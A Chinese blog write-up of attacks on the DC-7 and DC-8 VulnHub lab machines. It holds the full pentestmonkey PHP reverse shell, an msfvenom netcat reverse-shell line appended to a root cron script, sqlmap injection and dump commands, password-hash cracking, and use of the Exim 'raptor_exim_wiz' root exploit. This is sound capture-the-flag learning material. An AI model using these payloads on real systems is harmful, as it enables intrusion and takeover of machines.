渗透学习——DC-7与DC-8靶机渗透测试

阅读量    131055 |   稿费 270

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

 

前言

新人小白初学渗透测试,参考前辈大佬的文章,然后将自己动手操作并写下来的DC-7与DC-8的靶机Write-Up文章在此分享

初学渗透测试,如果有什么错误或者更好的思路,还请大佬们多多批评与指教,谢谢!

由于网络环境的变化,攻击机和靶机的IP可能发生改变。如果有改变,我会在开头的环境中写出来

 

DC-7

环境

虚拟机平台:VMware Workstation Pro

攻击机:Kali(IP:192.168.43.84)

靶机:DC-7(IP:192.168.43.29)

渗透测试

nmap扫描IP,开放2280端口

root@Knlvre:~# nmap -p- -A 192.168.43.29
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-27 09:36 CST
Nmap scan report for bogon (192.168.43.29)
Host is up (0.0035s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
MAC Address: 00:0C:29:BB:F1:42 (VMware)
Device type: general purpose

访问80端口,发现是Drupal框架。第一时间想到MSF,搜索drupal,利用了几个最新的模块后都没能成功拿到shell。回到网页看提示

7-1

Welcome to DC-7

DC-7 introduces some “new” concepts, but I’ll leave you to figure out what they are. 🙂

While this challenge isn’t all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won’t succeed.

What you will have to do, is to think “outside” the box.

Way “outside” the box. 🙂

注意到这里的提示outside和底部的DC7USER,这里需要推特搜索这个用户,然后发现这个账户有一个链接:https:/github.com/Dc7User,我没有注册,所以直接用别人的图

7-2

打开这个连接之后,看到后看到一个叫stuffdbphp仓库

7-3

进入之后出现了提示

This is some “code” (yes, it’s not the greatest code, but that wasn’t the point) for the DC-7 challenge.

This isn’t a flag, btw, but if you have made it here, well done anyway. 🙂

打开login.php没有发现账号密码,但是includeconfig.php,去查看看到了账号密码

<?php 
    $servername = "localhost"; 
    $username = "dc7user"; 
    $password = "MdR3xOgB7#dW"; 
    $dbname = "Staff"; 
    $conn = mysqli_connect($servername, $username, $password, $dbname); 
?>

拿到上面的账号密码之后,想到刚才扫描端口有看到开放22号端口,直接拿去连接,果然成功

 fingerprint is SHA256:J5aG8w2iY0G0Nh3p4L+WzXXaQ7O1GjFTlfAYwkBIbM4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.43.29' (ECDSA) to the list of known hosts.
dc7user@192.168.43.29's password: 
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64
...
dc7user@dc-7:~$ id
uid=1000(dc7user) gid=1000(dc7user) groups=1000(dc7user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

查看当前目录,发现了邮箱记录mbox,查看

dc7user@dc-7:~$ ls
backups  mbox
dc7user@dc-7:~$ cat mbox
...
From root@dc-7 Fri Aug 30 03:15:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 03:15:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
    (envelope-from <root@dc-7>)
    id 1i3O0y-0000Ed-To
    for root@dc-7; Fri, 30 Aug 2019 03:15:17 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3O0y-0000Ed-To@dc-7>
Date: Fri, 30 Aug 2019 03:15:17 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]
...

刚开始关注到这个backups/website.sql,查看之后发现是gpg加密文件,就先不去看。再次关注到邮件的Subject: Cron <root@dc-7> /opt/scripts/backups.sh,查看该文件

dc7user@dc-7:/opt/scripts$ cat backups.sh 
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

关注到这个drush命令,是drupal框架中用来做一些配置的命令,它可以改变用户名密码,格式如下:

drush user-password admin --password="new_pass"

切换到/var/www/html下,用drush试着改变admin的密码,修改成功

dc7user@dc-7:/opt/scripts$ cd /var/www/html
dc7user@dc-7:/var/www/html$ drush user-password admin --password="123456"
Changed password for admin

回到浏览器,用admin登录,成功

7-4

进来后Manage -> Extend -> List -> Install new module,进入安装新插件的页面

7-5

从下面的网页中下载插件php-8.x-1.0.tar.gz,然后点击Install上传到靶机上

https://www.drupal.org/project/php

7-6

上传成功页面中,点击Enable newly added modules,前往激活插件

7-7

点开FILTERS选项卡,勾选PHP Filter,然后点击下方的Install

7-8

现在回到主页,点击在左边的Tools栏中点击Add content -> Basic page

Body栏内写入一个反向shell

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.43.84';  // CHANGE THIS
$port = 3737;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is end down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    if (!$daemon) {
        print "$stringn";
    }
}

?>

现在本地打开监听,然后点击Preview,成功拿到shell

root@Knlvre:~# nc -lvnp 3737
listening on [any] 3737 ...
connect to [192.168.43.84] from (UNKNOWN) [192.168.43.29] 60104
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux
 13:28:32 up  2:52,  1 user,  load average: 0.01, 0.06, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
dc7user  pts/0    192.168.43.84    12:33   34:56   0.25s  0.25s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

$ python -c "import pty;pty.spawn('/bin/bash')"

www-data@dc-7:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

在确认无其他可利用信息之后,查看最初的backups.sh的权限

www-data@dc-7:/opt/scripts$ ls -l
-rwxrwxr-x 1 root www-data 520 Aug 29 23:02 backups.sh

文件拥有者为root,而root用户在www-data组内,说明我们当前的www-data用户拥有对该文件的所有权限(r、w、x)

现在就可以滥用"写"权限来完成提权,借助工具msfvenom,Kali端输入如下命令

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.43.84 lport=7373 R

等待一段时间之后,msfvenom就会返回一段命令

root@Knlvre:~# msfvenom -p cmd/unix/reverse_netcat lhost=192.168.43.84 lport=7373
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 91 bytes
mkfifo /tmp/bqro; nc 192.168.43.84 7373 0</tmp/bqro | /bin/sh >/tmp/bqro 2>&1; rm /tmp/bqro

nc监听7373端口

root@Knlvre:~# nc -lvnp 7373
listening on [any] 7373 ...

然后复制刚才msfvenom返回的最后一行,加上引号,前面加echo,后面加>> backups.sh。然后在刚才拿到的靶机的shell中执行如下命令,然后什么都不用做了,等待连接就行

echo "mkfifo /tmp/bqro; nc 192.168.43.84 7373 0</tmp/bqro | /bin/sh >/tmp/bqro 2>&1; rm /tmp/bqro" >> backups.sh

马上返回了root的shell,拿下flag

root@Knlvre:~# nc -lvnp 7373
listening on [any] 7373 ...
connect to [192.168.43.84] from (UNKNOWN) [192.168.43.29] 55244
id
uid=0(root) gid=0(root) groups=0(root)


cd /root
ls
theflag.txt
cat theflag.txt

888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-7.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.

 

DC-8

环境

虚拟机平台:VMware Workstation Pro

攻击机:Kali(IP:192.168.43.84或192.168.0.111)

靶机:DC-8(IP:192.168.43.165或192.168.0.112)

渗透测试

nmap扫描IP,开放2280端口,访问80端口,还是drupal框架

在点击左侧Details栏时,发现URL中的nid在改变

8-1

添加单引号后报错,直接给执行的语句,发现是整形注入

8-2

sqlmap跑,直接跑出了数据库

sqlmap -u http://192.168.43.165/?nid=1 --dbs --batch

d7db
information_schema

sqlmap -u http://192.168.43.165/?nid=1 -D d7db --tables --batch

users

users_roles

选择users表,爆出admin的密码

sqlmap -u http://192.168.43.165/?nid=1 -D d7db -T users --dump --batch
uid name pass
1 admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
2 john $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

john爆破密码(admin的没有出来,john的出来了)

# vi password_dc8.txt
# 填入$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
# john password_dc8.txt

root@Knlvre:~# vi password_dc8.txt 
root@Knlvre:~# john password_dc8.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
turtle           (?)
1g 0:00:00:11 DONE 2/3 (2019-09-27 16:09) 0.08912g/s 99.10p/s 99.10c/s 99.10C/s tucker..utopia
Use the "--show" option to display all of the cracked passwords reliably
Session completed

dirsearch扫描登录目录,扫到/user,登录john的账号成功。点击上面的Contact Us,切换界面后点击Webform -> form settings,选择PHP code,然后填入之前用的reverse shell(注意:在shell前面加上任意字符串,然后记得修改地址和端口),点击提交

8-3

先开启监听

root@Knlvre:~# nc -lvnp 3737
listening on [any] 3737 ...

然后回到Contact us主页面,随意填写基本内容,然后提交

8-4

再次回到Terminal,就拿到了shell。查找具有SUID权限的文件

$ python -c "import pty;pty.spawn('/bin/bash')"

www-data@dc-8:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@dc-8:/$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount

注意这个exim4,利用它来提权,查看版本

www-data@dc-8:/$ exim4 --version | head -1
Exim version 4.89 #2 built 14-Jun-2017 05:03:07

Exploit Database里搜索exim,利用这篇:https://www.exploit-db.com/exploits/46996

由于www-data用户在当前目录下无写权限,所以切换到/tmp目录下,因为有写权限

www-data@dc-8:/$ ls -l
...
drwxr-xr-x   2 root root  4096 Sep  5 00:23 srv
dr-xr-xr-x  13 root root     0 Sep 30 01:45 sys
drwxrwxrwt   2 root root  4096 Oct  1 07:42 tmp
drwxr-xr-x  10 root root  4096 Sep  5 00:23 usr
drwxr-xr-x  12 root root  4096 Sep  5 00:32 var
...

可以直接wget刚才的地址,也可以下载到Kali上,然后开启临时Web服务下载到靶机上,但是当我./执行时一直报错:

8-5

www-data@dc-8:/tmp$ wget http://192.168.0.111:7373/46996.sh
--2019-10-01 08:16:21--  http://192.168.0.111:7373/46996.sh
Connecting to 192.168.0.111:7373... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3706 (3.6K) [text/x-sh]
Saving to: '46996.sh'

46996.sh            100%[===================>]   3.62K  --.-KB/s    in 0s      

2019-10-01 08:16:21 (28.9 MB/s) - '46996.sh' saved [3706/3706]

www-data@dc-8:/tmp$ ls
46996.sh

www-data@dc-8:/tmp$ chmod 777 46996.sh

www-data@dc-8:/tmp$ ./46996.sh
bash: ./46996.sh: /bin/bash^M: bad interpreter: No such file or directory

所以只能直接用vi命令直接写:点击如下图位置,复制弹出的内容,然后直接在靶机中新建文件,写入其中

8-6

www-data@dc-8:/tmp$ ls
raptor_exim_wiz.sh

www-data@dc-8:/tmp$ vi raptor_exim_wiz.sh    #写入

www-data@dc-8:/tmp$ ls
raptor_exim_wiz.sh

www-data@dc-8:/tmp$ chmod 777 raptor_exim_wiz.sh

按照文档内的Usage,有两种方法来执行该文件

# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)

尝试过程中,第一种方法提权失败

www-data@dc-8:/tmp$ ./raptor_exim_wiz.sh -m setuid
./raptor_exim_wiz.sh -m setuid
./raptor_exim_wiz.sh: line 1: m_wiz: command not found

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Preparing setuid shell helper...
Problems compiling setuid shell helper, check your gcc.
Falling back to the /bin/sh method.

Delivering setuid payload...
220 dc-8 ESMTP Exim 4.89 Tue, 01 Oct 2019 08:26:09 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1iF47N-0000O7-Uz
221 dc-8 closing connection

Waiting 5 seconds...
-rwxr-xr-x 1 www-data www-data 117208 Oct  1 08:26 /tmp/pwned
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

尝试第二种方式时成功了,直接拿到了root权限,拿下flag

Ps:此处当然也可以反弹shell到Kali上

www-data@dc-8:/tmp$ ./raptor_exim_wiz.sh -m netcat
./raptor_exim_wiz.sh -m netcat
./raptor_exim_wiz.sh: line 1: m_wiz: command not found

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Tue, 01 Oct 2019 08:27:59 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1iF499-0000Oj-KW
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open

id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)

cd /root

ls
flag.txt

cat flag.txt

Brilliant - you have succeeded!!!



888       888          888 888      8888888b.                             888 888 888 888
888   o   888          888 888      888  "Y88b                            888 888 888 888
888  d8b  888          888 888      888    888                            888 888 888 888
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888



Hope you enjoyed DC-8.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...

If you enjoyed this CTF, send me a tweet via @DCAU7.

 

参考文章

https://www.hackingarticles.in/dc7-vulnhub-walkthrough/

https://www.hackingarticles.in/dc8-vulnhub-walkthrough/

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读
|发表评论
|评论列表
加载更多